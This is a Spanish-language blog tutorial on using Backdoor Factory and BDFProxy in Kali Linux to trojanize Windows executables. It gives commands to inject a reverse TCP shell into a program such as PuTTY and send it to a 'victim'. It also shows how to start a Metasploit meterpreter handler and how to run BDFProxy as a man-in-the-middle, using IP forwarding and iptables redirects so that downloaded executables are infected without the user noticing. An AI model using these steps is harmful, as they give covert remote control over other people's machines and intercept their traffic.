APRENDAMOS A USAR BACKDOOR FACTORY Y BDFProxy EN KALI LINUX 2016.1

Este post lo quería escribir hace tiempo pero ya termine todos los niveles actualizados de DVWA entonces ya estoy libre, aun recuerdan una herramienta que publique llama SHELLTER? Bueno parecido a Backdoor Factory. Me imagino que la diferencia es que Shellter no esta en KALI LINUX.

Se preguntarán que es BACKDOOR FACTORY?

El objetivo de Backdoor Factory es Inyectar shellcodes en ficheros exe “al vuelo” con The Backdoor Factory Proxy (BDFProxy) The Backdoor Factory (BDF) es una herramienta escrita en Python para “parchear” binarios ejecutables añadiendo shellcodes mediante Code Cave Injection.

Recuerda que vamos a ver de las dos formas Backdoor Factory y BFDProxy. Ambos cumplen su misma funcion pero BFDProxy hace una como MITM.

mitm_bdf_proxy

 

BACKDOOR FACTORY
Para saber sobre sus comandos podemos ir a las opciones de ayuda

 backdoor-factory -h
 backdoor -f /root/Desktop/redtube.exe -s show

Primeramente vamos a seleccionar la ubicación de nuestro .exe recuerda que solo funciona para sistemas o programas de 32bits, luego podemos ver que tipo de shell le queremos agregar en el código

backdoor -f /root/Desktop/redtube.exe -s iat_reverse_tcp_stager_threaded -H  -P

Screenshot from 2016-08-01 22-59-38
Como ven hemos seleccionado la shell y colocamos nuestra IP y un puerto necesario.
Puertos de ejemplo:
8080
4444
Ese archivo se generará en una carpeta nueva llamada “backdoored” y encontraremos nuestro .exe y le vamos a enviar eso a nuestra victima.
Recomiendo putty porque queda abierto y no tiene instalación.
Ahora vamos abrir nuestro meterpreter

 msfconsole
 use exploit/multi/handler
 set PAYLOAD windows/meterpreter/reverse_tcp
 set LHOST IP
 set LPORT 8080
 exploit

Me imagino que tendrás como se usa msfconsole sino puedes visitar mis post

Y ejecutamos el programa .exe y tenemos control al sistema.

Screenshot from 2016-08-01 23-13-29

BDFProxy

Configurar las IP

 nano /etc/bdfproxy/bdfproxy.cfg

Colocamos nuestras IP sin cambiar nada más.

 bdfproxy

Ejecutamos BDFProxy
Screenshot from 2016-08-02 00-07-01
Al ejecutar nos aparece esto “bdfproxy_msf_resource.rc” para poder ejecutar en nuestro meterpreter.

service postgresql start
 msfconsole -r bdfproxy_msf_resource.rc

O

 msfconsole -r /usr/share/bdfproxy/bdfproxy_msf_resource.rc

Ahora vamos a configurar nuestro Firewall

 sysctl -w net.ipv4.ip_forward=1

o

 echo 1 > /proc/sys/net/ipv4/ip_forward
 iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 80 -j REDIRECT --to-port 8080
 iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 443 -j REDIRECT --to-port 8080

Ahora nuestra victima va a descargar un .exe y quedará totalmente infectado y tomarás control sin que se de cuenta.
Al ejecutar .exe veras la consola de meterpreter que tengas el control del sistema.

Espero haberte ayudado y no te olvides en compartirlo.